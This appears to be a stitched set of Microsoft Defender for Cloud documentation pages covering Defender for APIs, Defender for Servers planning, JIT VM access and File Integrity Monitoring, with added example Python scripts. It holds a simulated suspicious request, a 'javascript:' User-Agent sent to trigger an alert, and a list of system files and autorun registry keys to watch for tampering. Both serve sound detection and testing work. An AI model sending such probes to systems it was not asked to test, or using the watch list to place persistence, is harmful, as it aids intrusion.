of a suspicious user agent. 


Prerequisites 


• Create a new Azure API Management service instance in the Azure portal

• Check the support and prerequisites for Defender for APIs deployment

• Import and publish your first API

• Onboard Defender for APIs

• An account with Postman


Simulate an alert 


1. Sign in to the Azure portal.


2. Search for and select API Management services. 




3. Select APIs.


5. Navigate to the Test tab.


6. Select Get Retrieve resource (cached).




7. In the HTTP request section, select the see more button.

[Screenshot: Echo API > Retrieve resource (cached) > Console, showing the Request URL and HTTP request]

8. Select the Copy button.

9. Navigate and sign in to your Postman account.

10. Select My Workspace.

11. Select +.

12. Enter the HTTPS request information you copied.

13. Select the Headers tab.

14. In the key field, enter Ocp-Apim-Subscription-Key.

15. In the value field, enter the key you copied.

16. In the key field, enter User-Agent.

17. In the value field, enter javascript:.


After some time, Defender for APIs will trigger an alert with detailed information about the simulated suspicious user agent activity.
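The same request the Postman steps above build, as a script you can run against your own onboarded API when validating that the detection fires. This is an added example, not Microsoft's code; the URL, query parameter and key in it are constructed placeholders to replace with the Request URL and subscription key copied from your API Management instance.

```python
"""Scripted equivalent of the Postman walkthrough above (added example, not
Microsoft's code): send one request to your own onboarded API that carries the
User-Agent value the walkthrough uses, and report whether the request reached
the API. URL and key values are constructed placeholders."""
import urllib.error
import urllib.request

SUSPICIOUS_USER_AGENT = "javascript:"   # value entered in step 17 above


def build_simulation_headers(subscription_key: str) -> dict:
    """Headers from steps 14-17: the APIM subscription key plus the test User-Agent."""
    if not subscription_key.strip():
        raise ValueError("subscription key is required (copy it from API Management)")
    return {
        "Ocp-Apim-Subscription-Key": subscription_key,
        "User-Agent": SUSPICIOUS_USER_AGENT,
    }


def send_simulation_request(url: str, subscription_key: str, timeout: float = 10) -> int:
    """Send one GET to the copied Request URL and return the HTTP status code.
    Only traffic that actually reaches the API is observed, so a non-2xx status
    (for example a rejected subscription key) means no alert should be expected."""
    req = urllib.request.Request(
        url, headers=build_simulation_headers(subscription_key), method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code        # e.g. 401 when the key is missing or wrong


if __name__ == "__main__":
    # Constructed placeholders: replace with the values copied from your instance.
    URL = "https://<your-apim-name>.azure-api.net/echo/resource-cached?param1=sample"
    KEY = "<your-subscription-key>"
    print("status:", send_simulation_request(URL, KEY))
```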


Next steps 


Learn how to Investigate API findings, recommendations, and alerts. 


Investigate API findings, 
recommendations, and alerts 


Article • 09/29/2023


This article describes how to investigate API security findings, alerts, and security 
posture recommendations for APIs protected by Microsoft Defender for APIs. 


Before you start 


• Onboard your API resources to Defender for APIs.

• To explore security risks within your organization using Cloud Security Explorer, the Defender Cloud Security Posture Management (CSPM) plan must be enabled. Learn more.


View recommendations and runtime alerts 
1. In the Defender for Cloud portal, select Workload protections. 
2. Select API security (Preview). 


3. In the API Security dashboard, select an API collection. 




4. In the API collection page, to drill down into an API endpoint, select the ellipses (...) > View resource.


[Screenshot: API Security (Preview) page for the echo-api collection, listing each endpoint with its HTTP method, last called date, 30 days unused, authentication, external traffic and data classification columns, and the View resource option under the ellipses]


5. In the Resource health page, review the endpoint settings. 
6. In the Recommendations tab, review recommendation details and status. 


7. In the Alerts tab, review security alerts for the endpoint. Defender for Endpoint monitors API traffic to and from endpoints, to provide runtime protection against suspicious behavior and malicious attacks.


[Screenshot: Resource health page for echo-api, with Recommendations and Alerts tabs; the active recommendations include "API endpoints in Azure API Management should be authenticated" and an unused-endpoints recommendation, both shown as Unhealthy]


Create sample security alerts 


In Defender for Cloud you can use sample alerts to evaluate your Defender for Cloud 
plans, and validate your security configuration. Follow these instructions to set up 
sample alerts, and select the relevant APIs within your subscriptions. 


Simulate alerts 


To see the alert process in action, you can simulate an action that triggers a Defender for APIs alert. Follow the instructions in our Tech Community blog to do that.


Build queries in Cloud Security Explorer 


In Defender CSPM, Cloud Security Graph collects data to provide a map of assets and connections across organization, to expose security risks, vulnerabilities, and possible lateral movement paths.


When the Defender CSPM plan is enabled together with Defender for APIs, you can use Cloud Security Explorer to identify, review and analyze API security risks across your organization.


1. In the Defender for Cloud portal, select Cloud Security Explorer. 

2. In What would you like to search? select the APIs category. 

3. Review the search results so that you can review, prioritize, and fix any API issues. 

4. Alternatively, you can select one of the templated API queries to see high risk issues like Internet exposed API endpoints with sensitive data or APIs communicating over unencrypted protocols with unauthenticated API endpoints.


Next steps 


Manage your Defender for APIs deployment. 


Manage your Defender for APIs 
deployment 


Article • 07/13/2023


This article describes how to manage your Microsoft Defender for APIs plan deployment 
in Microsoft Defender for Cloud. Management tasks include offboarding APIs from 
Defender for APIs. 


Defender for APIs is currently in preview. 


Offboard an API 


1. In the Defender for Cloud portal, select Workload protections. 
2. Select API security. 


3. Next to the API you want to offboard from Defender for APIs, select the ellipsis (...) 
> Remove. 


[Screenshot: API Security (Preview) page showing counts of API Collections, API Endpoints and Azure API Management Services]


Query your APIs with the cloud security 
explorer 


You can use the cloud security explorer to run graph-based queries on the cloud 
security graph. By utilizing the cloud security explorer, you can proactively identify 
potential security risks to your APIs. 


There are three types of APIs you can query:

• API Collections - A group of all types of API collections.

• API Endpoints - A group of all types of API endpoints.

• API Management services - API management services are platforms that provide tools and infrastructure for managing APIs, typically through a web-based interface. They often include features such as: API gateway, API portal, API analytics and API security.


To query APIs in the cloud security graph: 


1. Sign in to the Azure portal.


2. Navigate to Microsoft Defender for Cloud > Cloud Security Explorer. 


3. From the drop down menu, select APIs. 


[Screenshot: Cloud Security Explorer with the APIs category expanded under "What would you like to search?", showing the API Collections, API Endpoints and API Management services resource types]


4. Select all relevant options. 
5. Select Done. 
6. Add any other conditions. 


7. Select Search. 




You can learn more about how to build queries with cloud security explorer. 


Next steps 


Learn about Defender for APIs. 


Common questions about 
Defender for APIs 


FAQ 


Availability and onboarding 


I'm getting an error while onboarding APIs to 
Defender for APIs from the Recommendations 
page. 


If you encounter errors like "Access Denied", "Forbidden", "Role Assignment not found", 
or "Authorization Failed", ensure that you have the right level of permission for the 
Azure API Management service and Microsoft Defender for Cloud. Required set of 
permissions can be found here. The error "Request Header or Cookie Too Large" can 
typically be fixed by clearing all cookies; clear your browser cookies and try the 
operation again. 


Does onboarding APIs to Defender for APIs 
affect my Azure API Management service? 


Enabling Defender for APIs monitoring coverage requires compute & memory utilization on the Azure API Management service. Monitor the performance of your Azure API Management service while onboarding APIs and scale out your Azure API Management resources when needed.


I use Azure API Management Consumption tier offering. Can I use Defender for APIs?


No, support for Azure API Management consumption tier is currently not available. 


How does Defender for APIs handle support for 
API revisions in Azure API Management? 


API revisions in Azure API Management are shown as separate API endpoints within Defender for APIs because each API revision is unique and might have its own security insights. Offline Azure API Management API revisions aren't shown in the onboarding or security insights blades of Defender for APIs because offline revisions don't allow any traffic to be sent to them and pose no security risk.


Questions related to region/geo 


| just moved my APIs within my Azure API 
Management service to a new region. Why are 
these not updated? 


APIs that are moved from one region to another region require offboarding and 
onboarding of the APIs. 


How do I enable Defender for APIs plan for a 
specific set of Azure API Management services? 


Microsoft Defender for APIs plan is enabled at the subscription level. You can select 
which APIs in Azure API Management from that subscription are onboarded for security 
coverage. 


I onboarded APIs from Azure API Management to Defender for APIs, but they're still showing under unhealthy resources on the recommendation page / I don't see any security insights for the APIs I onboarded.


Defender for APIs will take 30 minutes to generate the first security insights after 
onboarding an API and to move the onboarded APIs from unhealthy to healthy status. 
Thereafter, security insights are refreshed every 30 minutes. 


Why do security insights within the API collection details page show as "Awaiting Data"?


API endpoints that have received no traffic since onboarding to Defender for APIs display the message 'Awaiting data' under security insights. Until the API endpoint receives traffic, the security insight assessment can't be made.


I have a self-hosted Azure API Management gateway. Can I use Defender for APIs for securing my APIs?


Currently Defender for APIs support is limited to the cloud hosted instances of Azure 
API Management gateways only. 


My Azure API Management service is in a VNet. 
Do I need to have additional connectivity
configured for Defender for APIs? 


No, Defender for APIs won't need special configuration for accessing API data from 
Azure API Management service behind a VNET. 


What is the IP address shown in Defender for 
APIs alerts description page if x-forwarded-for is 
configured within our network? 


Defender for APIs shows the IP address of the inbound IP address from client IPs. If x-forwarded-for is used, Defender for APIs validates the IP hops as part of the x-forwarded-for used within the request to show the most accurate IP that the inbound request is coming from.


We use a custom domain URL within Azure API 
Management, will Defender for APIs show this 
URL as the Endpoint URL? 


Custom domain URLs aren't shown within the Endpoint URL. The Defender for APIs 
Endpoint URL shows the base URL of your API Management API endpoint.


Does Defender for APIs support APIs published 
in multi-region Azure API Management 
deployments? 


There is currently limited support for API security insights for APIs published in Azure API Management multi-region deployments. Security insights, including data classifications, assessments of inactive APIs, unauthenticated APIs, and external APIs, are limited to supporting API traffic to the primary region (no support for security insights for secondary regions). All security detections and subsequently generated security alerts will work for API traffic sent to both primary and secondary regions.


Questions about alerts in Defender for 
APIs 


How soon can we receive alerts on anomalous 
APIs? 


APIs are assessed against their behavior studying traffic for the past 30 days. The alerts 
on anomalous APIs may be generated sooner if the API receives significant traffic for the 
ML models to learn traffic behavior. 


Questions about Defender for APIs and 
WAF 


Is Azure WAF sufficient for securing APIs? 


While Web Application Firewalls (WAF) are a valuable solution for protecting 
applications, they may not provide complete security for APIs. WAFs are designed to 
apply generalized protection measures like dictionary, pattern, and signature mapping, 
which work well for applications with consistent traffic patterns. However, APIs are 
unique to each application and have dynamically changing nature, making the abstract 
protections offered by WAFs less effective. 

APIs have different request and response payloads, and each consumer interacts with 
them in their own specific ways. The general dictionary, pattern, and signature mappings 
used by WAFs may not adequately offer complete in depth protection for APIs due to 
their uniqueness. Although there are some cases where overlap exists, such as detecting 
and preventing SQL injection attacks, APIs often require more granular security 
measures. 

To achieve the level of security needed for APIs, a solution like Microsoft Defender for APIs is recommended. Defender for APIs learns and understands the API logic using machine learning algorithms, thereby providing a contextual understanding that enables more precise and effective security measures. This granular level of protection helps safeguard APIs against various threats and ensures a higher level of security for organizations.


Next steps 


Learn about Defender for APIs 


Plan your Defender for Servers 
deployment 


Article • 05/29/2023


Microsoft Defender for Servers extends protection to your Windows and Linux machines 
that run in Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and on- 
premises. Defender for Servers integrates with Microsoft Defender for Endpoint to 
provide endpoint detection and response (EDR) and other threat protection features. 


This guide helps you design and plan an effective Defender for Servers deployment. 
Microsoft Defender for Cloud offers two paid plans for Defender for Servers. 


About this guide 


The intended audience of this guide is cloud solution and infrastructure architects, 
security architects and analysts, and anyone who's involved in protecting cloud and 
hybrid servers and workloads. 


The guide answers these questions: 


• What does Defender for Servers do and how is it deployed?

• Where is my data stored and what Log Analytics workspaces do I need?

• Who needs access to my Defender for Servers resources?

• Which Defender for Servers plan should I choose and which vulnerability assessment solution should I use?

• When do I need to use Azure Arc and which agents and extensions are required?

• How do I scale a deployment?


Before you begin 


Before you review the series of articles in the Defender for Servers planning guide: 


• Review Defender for Servers pricing details.

• If you're deploying for AWS machines or GCP projects, review the multicloud planning guide.


Deployment overview 


The following table shows an overview of the Defender for Servers deployment process:


Stage: Start protecting resources
Details:
• When you open Defender for Cloud in the portal, it starts protecting resources with free foundational CSPM assessments and recommendations.
• Defender for Cloud creates a default Log Analytics workspace with the SecurityCenterFree solution enabled.
• Recommendations start appearing in the portal.


Stage: Enable Defender for Servers
Details:
• When you enable a paid plan, Defender for Cloud enables the Security solution on its default workspace.
• Enable Defender for Servers Plan 1 (subscription only) or Plan 2 (subscription and workspace).
• After enabling a plan, decide how you want to install agents and extensions on Azure VMs in the subscription or workgroup.
• By default, auto-provisioning is enabled for some extensions.


Stage: Protect AWS/GCP machines
Details:
• For a Defender for Servers deployment, you set up a connector, turn off plans you don't need, configure auto-provisioning settings, authenticate to AWS/GCP, and deploy the settings.
• Auto-provisioning includes the agents used by Defender for Cloud and the Azure Connected Machine agent for onboarding to Azure with Azure Arc.
• AWS uses a CloudFormation template.
• GCP uses a Cloud Shell template.
• Recommendations start appearing in the portal.


Stage: Protect on-premises servers
Details:
• Onboard them as Azure Arc machines and deploy agents with automation provisioning.


Stage: Foundational CSPM
Details:
• There are no charges when you use foundational CSPM with no plans enabled.
• AWS/GCP machines don't need to be set up with Azure Arc for foundational CSPM. On-premises machines do.
• Some foundational recommendations rely only on agents: Antimalware / endpoint protection (Log Analytics agent or Azure Monitor agent) | OS baselines recommendations (Log Analytics agent or Azure Monitor agent and Guest Configuration extension) | System updates recommendation (Log Analytics agent)
• Learn more about foundational cloud security posture management (CSPM).
• Learn more about Azure Arc onboarding.


When you enable Microsoft Defender for Servers on an Azure subscription or a 
connected AWS account, all of the connected machines are protected by Defender for 
Servers. You can enable Microsoft Defender for Servers at the Log Analytics workspace 
level, but only servers reporting to that workspace will be protected and billed and 
those servers won't receive some benefits, such as Microsoft Defender for Endpoint, 
vulnerability assessment, and just-in-time VM access. 


Next steps 


After kicking off the planning process, review the second article in this planning series to 
understand how your data is stored, and Log Analytics workspace requirements. 


Plan data residency and workspaces for 
Defender for Servers 
This article helps you understand how your data is stored in Microsoft Defender for Servers and how Log Analytics workspaces are used in Defender for Servers.


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the second article in the Defender for Servers planning guide series. Begin by planning your deployment.


Understand data residency 


Data residency refers to the physical or geographic location of your organization's data. 


Before you deploy Defender for Servers, it's important for you to understand data residency for your organization:


• Review general Azure data residency considerations.

• Review the table in the next section to understand where Defender for Cloud stores data.


Storage locations 


Understand where Defender for Cloud stores data and how you can work with your data:


Data: Security alerts and recommendations
Location:
- Stored in the Defender for Cloud back end and accessible via the Azure portal, Azure Resource Graph, and REST APIs.
- You can export the data to a Log Analytics workspace by using continuous export.


Data: Machine information
Location:
- Stored in a Log Analytics workspace.
- You can use either the default Defender for Cloud workspace or a custom workspace. Data is stored in accordance with the workspace location.


Workspace considerations 


In Defender for Cloud, you can store server data in the default Log Analytics workspace 
for your Defender for Cloud deployment or in a custom workspace. 


Here's more information: 


• By default, when you enable Defender for Cloud for the first time, a new resource group and a default workspace are created in the subscription region for each subscription that has Defender for Cloud enabled.

• When you use only free foundational cloud security posture management (CSPM), Defender for Cloud sets up the default workspace with the SecurityCenterFree solution enabled.

• When you turn on a Defender for Cloud plan (including Defender for Servers), the plan is enabled for the default workspace, and the Security solution is enabled.

• If you have virtual machines in multiple locations, Defender for Cloud creates multiple workspaces accordingly to ensure data compliance.

• Default workspace names are in the format [subscription-id]-[geo].


Default workspaces 


Defender for Cloud default workspaces are created in the following locations: 


Server location: United States, Canada, Europe, United Kingdom, Korea, India, Japan, China, Australia
Workspace location: The workspace is created in the matching location.

Server location: Brazil
Workspace location: United States

Server location: East Asia, Southeast Asia
Workspace location: Asia


Custom workspaces 


You can store your server information in the default workspace or you can use a custom 
workspace. A custom workspace must meet these requirements: 


• You must enable the Defender for Servers plan in the custom workspace.

• The custom workspace must be associated with the Azure subscription in which Defender for Cloud is enabled.

• You must have at least read permissions for the workspace.

• If the Security & Audit solution is installed in a workspace, Defender for Cloud uses the existing solution.


Next steps 


• After you work through these planning steps, review Defender for Server access roles.

• Check out the common questions about workspaces in Defender for Servers.


Understanding just-in-time (JIT) VM 
access 
This page explains the principles behind Microsoft Defender for Cloud's just-in-time (JIT) VM access feature and the logic behind the recommendation.


To learn how to apply JIT to your VMs using the Azure portal (either Defender for Cloud 
or Azure Virtual Machines) or programmatically, see How to secure your management 
ports with JIT. 


The risk of open management ports on a 
virtual machine 


Threat actors actively hunt accessible machines with open management ports, like RDP or SSH. All of your virtual machines are potential targets for an attack. When a VM is successfully compromised, it's used as the entry point to attack further resources within your environment.


Why JIT VM access is the solution 


As with all cybersecurity prevention techniques, your goal should be to reduce the 
attack surface. In this case that means having fewer open ports especially management 
ports. 


Your legitimate users also use these ports, so it's not practical to keep them closed. 


To solve this dilemma, Microsoft Defender for Cloud offers JIT. With JIT, you can lock 
down the inbound traffic to your VMs, reducing exposure to attacks while providing 
easy access to connect to VMs when needed. 


How JIT operates with network resources in 
Azure and AWS 


In Azure, you can block inbound traffic on specific ports, by enabling just-in-time VM 
access. Defender for Cloud ensures "deny all inbound traffic" rules exist for your 
selected ports in the network security group (NSG) and Azure Firewall rules. These rules 
restrict access to your Azure VMs’ management ports and defend them from attack. 


If other rules already exist for the selected ports, then those existing rules take priority 
over the new "deny all inbound traffic" rules. If there are no existing rules on the 
selected ports, then the new rules take top priority in the NSG and Azure Firewall. 


In AWS, by enabling JIT-access the relevant rules in the attached EC2 security groups, for 
the selected ports, are revoked which blocks inbound traffic on those specific ports. 


When a user requests access to a VM, Defender for Cloud checks that the user has Azure 
role-based access control (Azure RBAC) permissions for that VM. If the request is 
approved, Defender for Cloud configures the NSGs and Azure Firewall to allow inbound 
traffic to the selected ports from the relevant IP address (or range), for the amount of 
time that was specified. In AWS, Defender for Cloud creates a new EC2 security group 
that allows inbound traffic to the specified ports. After the time has expired, Defender 
for Cloud restores the NSGs to their previous states. Connections that are already 
established aren't interrupted. 


Note

JIT does not support VMs protected by Azure Firewalls controlled by Azure Firewall Manager. The Azure Firewall must be configured with Rules (Classic) and cannot use Firewall policies.


How Defender for Cloud identifies which VMs 
should have JIT applied 


The following diagram shows the logic that Defender for Cloud applies when deciding how to categorize your supported VMs:


[Diagram: Azure decision flow with these checks]
• Is just-in-time VM access already enabled?
• Is the VM assigned to a network security group? If so, does the NSG have Allow rules for ports 22, 3389, 5985, and 5986?
• Is the VM protected by a firewall? If so, does the firewall have Allow rules for the same management ports?
• Outcomes: a recommendation to enable just-in-time VM access, or the VM is classified as 'Not-applicable'.


When Defender for Cloud finds a machine that can benefit from JIT, it adds that 
machine to the recommendation's Unhealthy resources tab. 
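To make the categorization flow concrete, here is an added example (not Microsoft's code) that re-implements it over a constructed inventory and groups VMs into the recommendation's Unhealthy, Healthy and Not applicable tabs. Assumed in the example: a VM with JIT already enabled lands on Healthy, the firewall check uses the same four ports as the NSG check, and the rule and VM shapes are simplified stand-ins rather than Azure SDK types.

```python
"""Re-implementation of the JIT categorization flow above (added example, not
Microsoft's code). Assumptions: JIT already enabled -> 'Healthy'; the firewall
check uses the same ports as the NSG check; rule/VM shapes are simplified."""
from dataclasses import dataclass
from typing import Optional

# Management ports that the recommendation looks for Allow rules on.
MANAGEMENT_PORTS = frozenset({22, 3389, 5985, 5986})


def ports_in_range(spec: str) -> frozenset:
    """Expand an NSG-style destination port range ('*', '22', '5985-5986') into
    the management ports it covers; other ports don't matter for this check."""
    if spec.strip() == "*":
        return MANAGEMENT_PORTS
    lo, _, hi = spec.partition("-")
    low = int(lo)
    high = int(hi) if hi else low
    return frozenset(p for p in MANAGEMENT_PORTS if low <= p <= high)


@dataclass(frozen=True)
class InboundRule:
    """Simplified inbound rule: action plus the management ports it touches."""
    action: str          # "Allow" or "Deny"
    ports: frozenset     # subset of MANAGEMENT_PORTS covered by the rule


def rule(action: str, *port_ranges: str) -> InboundRule:
    covered = frozenset().union(*(ports_in_range(r) for r in port_ranges))
    return InboundRule(action, covered)


@dataclass
class VirtualMachine:
    name: str
    jit_enabled: bool = False
    nsg_rules: Optional[tuple] = None       # None: no NSG assigned
    firewall_rules: Optional[tuple] = None  # None: no firewall protects the VM


def opens_management_ports(rules) -> bool:
    """True if any Allow rule covers at least one management port."""
    return any(r.action == "Allow" and r.ports for r in rules)


def classify_vm(vm: VirtualMachine) -> str:
    """Return the recommendation tab the VM belongs on."""
    if vm.jit_enabled:
        return "Healthy"                 # assumption: JIT already applied
    if vm.nsg_rules is None:
        # No NSG: a firewall is the only place management ports could be open.
        if vm.firewall_rules is None or not opens_management_ports(vm.firewall_rules):
            return "Not applicable"
        return "Unhealthy"
    if not opens_management_ports(vm.nsg_rules):
        return "Not applicable"          # NSG already blocks the ports
    if vm.firewall_rules is not None and not opens_management_ports(vm.firewall_rules):
        return "Not applicable"          # firewall in front closes them
    return "Unhealthy"                   # recommendation to enable JIT


def recommendation_tabs(vms) -> dict:
    """Group VMs the way the recommendation page does."""
    tabs = {"Unhealthy": [], "Healthy": [], "Not applicable": []}
    for vm in vms:
        tabs[classify_vm(vm)].append(vm.name)
    return tabs


# Constructed sample inventory (not real resources).
SAMPLE_VMS = (
    VirtualMachine("web-01", nsg_rules=(rule("Allow", "3389"), rule("Allow", "443"))),
    VirtualMachine("db-01", jit_enabled=True),
    VirtualMachine("batch-02"),
    VirtualMachine("bastion-01", firewall_rules=(rule("Allow", "22-23"),)),
    VirtualMachine("api-03", nsg_rules=(rule("Allow", "*"),),
                   firewall_rules=(rule("Allow", "443"),)),
)

if __name__ == "__main__":
    for tab, names in recommendation_tabs(SAMPLE_VMS).items():
        print(f"{tab}: {', '.join(names) or '-'}")
```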


[Screenshot: recommendation "Management ports of virtual machines should be protected with just-in-time network access control". Description: Microsoft Defender for Cloud has identified some overly-permissive inbound rules for management ports in your Network Security Group. Enable just-in-time access control to protect your VM from internet-based brute-force attacks. The page shows Unhealthy resources (78), Healthy resources (112) and Not applicable resources (66) tabs.]


Next steps 


This page explained why just-in-time (JIT) virtual machine (VM) access should be used. 


To learn how to enable JIT and request access to your JIT-enabled VMs: 


How to secure your management ports with JIT 


File Integrity Monitoring in Microsoft Defender for Cloud 
File Integrity Monitoring (FIM) examines operating system files, Windows registries, application software, and Linux system files for changes that might indicate an attack.


FIM (file integrity monitoring) uses the Azure Change Tracking solution to track and identify changes in your environment. When FIM 
is enabled, you have a Change Tracking resource of type Solution. If you remove the Change Tracking resource, you'll also disable 
the File Integrity Monitoring feature in Defender for Cloud. FIM lets you take advantage of Change Tracking directly in Defender for 
Cloud. For data collection frequency details, see Change Tracking data collection details. 


Defender for Cloud recommends entities to monitor with FIM, and you can also define your own FIM policies or entities to monitor. 


FIM informs you about suspicious activity such as:

- File and registry key creation or removal
- File modifications (changes in file size, access control lists, and hash of the content)
- Registry modifications (changes in size, access control lists, type, and content)


Many regulatory compliance standards require implementing FIM controls, such as PCI-DSS and ISO 17799. 


Which files should I monitor?


When choosing which files to monitor, consider the files that are critical for your system and applications. Monitor files that you don't expect to change without planning. If you choose files that are frequently changed by applications or the operating system (such as log files and text files), they create noise, making it difficult to identify an attack.


Defender for Cloud provides the following list of recommended items to monitor based on known attack patterns. 


Linux files:
/bin/login
/bin/passwd
/etc/*.conf
/usr/bin
/usr/sbin
/bin
/sbin
/boot
/usr/local/bin
/usr/local/sbin
/opt/bin
/opt/sbin
/etc/crontab
/etc/init.d
/etc/cron.hourly
/etc/cron.daily
/etc/cron.weekly
/etc/cron.monthly

Windows files:
C:\autoexec.bat
C:\boot.ini
C:\config.sys
C:\Windows\system.ini
C:\Windows\win.ini
C:\Windows\regedit.exe
C:\Windows\System32\userinit.exe
C:\Windows\explorer.exe
C:\Program Files\Microsoft Security Client\msseces.exe

Windows registry keys (HKLM = HKEY_LOCAL_MACHINE):
HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\SYSTEM.ini\boot
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\IniFileMapping\system.ini\boot
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\SYSTEM\CurrentControlSet\Control\hivelist
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
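The comparison FIM performs (creation or removal, and changes in size, access control and content hash) can be illustrated with a minimal baseline-and-compare routine. This is an added example, not Defender for Cloud or Azure Change Tracking code: it records POSIX mode bits as a stand-in for an access control list, watches a few paths from the Linux list above relative to a constructed temporary directory rather than a live system, and the tampering performed in demo() is constructed to exercise each change type.

```python
"""Minimal file-integrity baseline-and-compare, an added illustration of the
checks the article lists (creation/removal; changes in size, access control
and content hash). Not Defender for Cloud or Change Tracking code: POSIX
mode bits stand in for an ACL, and demo() builds a constructed directory
tree instead of touching a real system."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# A few paths from the article's recommended Linux list, relative to a root
# so the demo can run against a constructed directory.
WATCHED = ["bin/login", "bin/passwd", "etc/crontab", "etc/init.d", "etc/cron.daily"]


def fingerprint(path: Path) -> dict:
    """Record the attributes compared: size, mode (ACL stand-in), content hash."""
    st = path.lstat()
    entry = {"size": st.st_size, "mode": stat.S_IMODE(st.st_mode), "sha256": None}
    if stat.S_ISREG(st.st_mode):
        entry["sha256"] = hashlib.sha256(path.read_bytes()).hexdigest()
    return entry


def snapshot(root: Path, watched=WATCHED) -> dict:
    """Fingerprint every watched path that exists; directories are walked."""
    baseline = {}
    for rel in watched:
        p = root / rel
        if not p.exists():
            continue
        targets = [p] if p.is_file() else [q for q in p.rglob("*") if q.is_file()]
        for q in targets:
            baseline[str(q.relative_to(root))] = fingerprint(q)
    return baseline


def compare(old: dict, new: dict) -> list:
    """Return (path, kind) pairs: 'created', 'removed', or 'modified:<attributes>'."""
    changes = []
    for path in sorted(set(old) | set(new)):
        if path not in old:
            changes.append((path, "created"))
        elif path not in new:
            changes.append((path, "removed"))
        else:
            diff = [k for k in ("size", "mode", "sha256") if old[path][k] != new[path][k]]
            if diff:
                changes.append((path, "modified:" + ",".join(diff)))
    return changes


def demo() -> list:
    """Build a constructed tree, baseline it, apply one change of each kind, report."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "etc" / "init.d").mkdir(parents=True)
        (root / "bin" / "login").write_bytes(b"\x7fELF login")
        (root / "bin" / "passwd").write_bytes(b"\x7fELF passwd")
        (root / "etc" / "crontab").write_text("0 3 * * * root /usr/bin/backup\n")
        os.chmod(root / "etc" / "crontab", 0o644)  # fix the mode so the baseline is deterministic
        (root / "etc" / "init.d" / "sshd").write_text("#!/bin/sh\n")
        base = snapshot(root)
        # One change of each kind the article lists:
        (root / "bin" / "passwd").write_bytes(b"\x7fELF passwd!")       # content and size
        os.chmod(root / "etc" / "crontab", 0o666)                         # access control
        (root / "etc" / "init.d" / "sshd").unlink()                       # removal
        (root / "etc" / "init.d" / "newscript").write_text("#!/bin/sh\n")  # creation
        return compare(base, snapshot(root))
```

Storing the baseline off-host (or in a write-once location) is what makes a comparison like this trustworthy: an attacker who can modify the watched files can usually also modify a baseline kept beside them.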


Next steps 


In this article, you learned about File Integrity Monitoring (FIM) in Defender for Cloud. 


Next, you can: 


- Enable File Integrity Monitoring when using the Azure Monitor Agent
- Enable File Integrity Monitoring when using the Log Analytics agent


Plan roles and permissions for Defender 
for Servers 


Article e 05/10/2023 


This article helps you understand how to control access to your Defender for Servers 
deployment. 


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the third article in the Defender for Servers planning guide. Before you 
begin, review the earlier articles: 


1. Start planning your deployment 
2. Understand where your data is stored and Log Analytics workspace requirements 


Determine ownership and access 


In complex enterprises, different teams manage different security functions in the organization.

It's critical that you identify ownership for server and endpoint security in your organization. Ownership that's undefined or hidden in organizational silos increases risk for the organization. Security operations (SecOps) teams that need to identify and follow threats across the enterprise are hindered. Deployments might be delayed or they might not be secure.


Security leadership should identify the teams, roles, and individuals that are responsible 
for making and implementing decisions about server security. 


Responsibility usually is shared between a central IT team and a cloud infrastructure and 
endpoint security team. Individuals on these teams need Azure access rights to manage 
and use Defender for Cloud. As part of planning, determine the right level of access for 
individuals based on the Defender for Cloud role-based access control (RBAC) model. 


Defender for Cloud roles 


